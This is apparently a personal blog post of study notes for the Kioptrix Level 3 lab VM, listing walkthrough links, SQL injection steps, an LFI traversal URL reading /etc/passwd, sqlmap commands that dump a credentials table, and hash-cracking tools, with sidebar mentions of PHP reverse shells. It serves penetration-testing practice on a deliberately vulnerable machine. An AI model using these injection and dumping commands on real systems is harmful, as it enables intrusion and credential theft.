Skip to main content

VMW - Kioptix level 1.3


2. https://blog.g0tmi1k.com/2011/08/kioptrix-level-3   …shows commands and videos but doesn’t explain what those select statements do unlike above site. Those select statement can be bypassed if Sqlmap is used instead to get hash
  1. https://www.abatchy.com/2016/12/kioptrix-3-walkthrough-vulnhub
  2. https://digital-cowboy.github.io/2017/kioptrix-level-3-walkthrough/



  1. Ssh and http
    1. Apache 2.2.8 php 5.2.4 ubuntu 5.6
  2. http://kioptrix3.com/gallery/gallery.php?id=1'
The thing that really caught our eye here was the “id” parameter in the URL. So we attempted to inject a single quote ( ‘ ) to try and see if the application was vulnerable to SQL Injection. And YES! Its vulnerable to SQL Injection because it throws the error –
Our links should look like that:
http://kioptrix3.com/gallery/gallery.php?id=1 order by 7– (Error – Unknown Column)
We will do this until it shows up in the unknown columns. If it shows the unknown column error on N, that means it has the total number of Columns N-1 because it shows the content in order by N-1 so in this case, the number of columns are 6.

  1. LFI using. Didn’t word w/o html
    1. http://IP/index.php?system=../../../../../etc/passwd.html
  2. Look at the source of all the pages and found Gallarific module which was commented out and susceptible SQL injection attack
  3.  /pentest/exploits/exploitdb or /usr/share/exploitdb > grep -I gallarific  files.csv
  4. At the login page shows it is LotusCMS application . One could use Metasploit to exploit the vulnerabiliy
  5. Pyhon sqlmap.py -u "http:kioptrix3.com/gallery/gallery/php?id=1" --dbs will show database names (but SQLMAP is not allowed in the exam)
    1. Python sqlmap.py -u “http://www.example.com/news.php?id=11” -D db363851433 –tables
Where db363851433 is the name of database
  1. Python sqlmap.py" -u “http://www.example.com/news.php?id=11” -D gallery -T dev_accounts -C id,password,username --dump…. Will show the table with username and hash which can be unhash within Kali or online [https://www.yeahhub.com/live-sql-injection-exploitation-sqlmap-detailed-guide/]
  1. You can also use “hash-identifier” tool to verify the hash type whether its MD5, SHA1 or any other
  2. "To Crack the hash, you can also use hashcat tool which is pre-installed in Kali Linux machine
From <https://www.yeahhub.com/ctf-kioptrix-level-3-walkthrough/>




Comments

Post a Comment

Popular posts from this blog

VM 13 : Basic Pentest 1 csec

Notes: Walkthru: 1. https://medium.com/@evire/basic-pentesting-1-7251fb3e3f9e [ w/metasploi t using Wordpress t] 2. https://prasannakumar.in/infosec/vulnhub-basic-pentesting-1-writeup/ [ w/metasploit using ftp ] 3.  https://www.ceos3c.com/hacking/basic-pentesting-1-walkthrough/ [ by uploading php-reverse-shell in wordpress ] 4. http://k3ramas.blogspot.com/2018/02/basic-pentesting-1-walkthrough.html [  access wordpress config file to get pwd and access the DB ] 5.  https://cowsayroot.com/walkthrough-basic-pentesting-1/ [ Wpscan, ftp metasploit vulnerability, phpbash ] 6.   http://www.hackingarticles.in/hack-the-basic-penetration-vm-boot2root-challenge/    [use msfvenom to create  to create php shell to be uploaded in Wordpress ] 7.   https://d7x.promiselabs.net/2018/01/30/ctf-basic-pentesting-a-guide-for-beginners/ [adding command using using PHP] Notes:  Ports - 21...ProFTPD 1.3.3c - 22 openSSH 7.2p2 ubuntu ...
2 comments
Read more

VM 5: Vulnix :

Walkthru: A. https://mrh4sh.github.io/vulnix-solution [SMTP and Finger enumeration, creating linux user with specific UID, root squashing, ssh pwd cracking using medusa & hydra, logging using ssh keys, updating /usr/sbin/exportfs] B. http://overflowsecurity.com/hacklab-vulnix/ [ same as above. create ssh keys for root and copied to victim to login as root w/o recovering pwd] C. https://www.rebootuser.com/?p=988[ local bash shell from nfs] B. https://www.vulnhub.com/?q=vulnix&sort=date-des&type=vm [list of solutions] D. https://www.rebootuser.com/?p=988 [User Enumeration #1 – SMTP, Finger; Entry Point including hydra, Putty(using rlogin service), nfs (showmount,mount) ] Notes: - As you can see the root user is the only account which is logged on the remote  host.Now that we have a specific username we can use it in order to obtain more information about this user with the command  finger root@host . -  Another effective use of the finger...
Post a Comment
Read more

VM: pWnOS 2.0

Walkthru A. http://defsecurityjam.blogspot.co.uk/2015/07/pwnos-version-2-walkthrough.html [reading source page, Simple PHP Blog Perl exploit, Python revershell using oneliner, looking around ] b. https://blog.g0tmi1k.com/2012/09/pwnos-2-php-web-application/ [metasploit using PHP Blog exploit] c. http://netsec.ws/?p=430 [burpsuite, sql porxy] d. https://blog.g0tmi1k.com/2012/09/pwnos-2-sql-injection/ [sql injection, union. Very good explanation of the process of what is being done. Didnt try cmds] e. https://www.youtube.com/watch?v=ytzZfI27ueU [sql injection, sqlmap read file and upload reverse shell using sqlmap] f. https://ub3rsec.github.io/pages/2016/pwnosv2-sqli.html [sql injection, union using burp Very good . It list all email field that we are passing and modifying thru burp suite/proxy/intercept. One could enter those union statements in the email field but in this case, the field truncates and remove the later part of union statment which is why we...
Post a Comment
Read more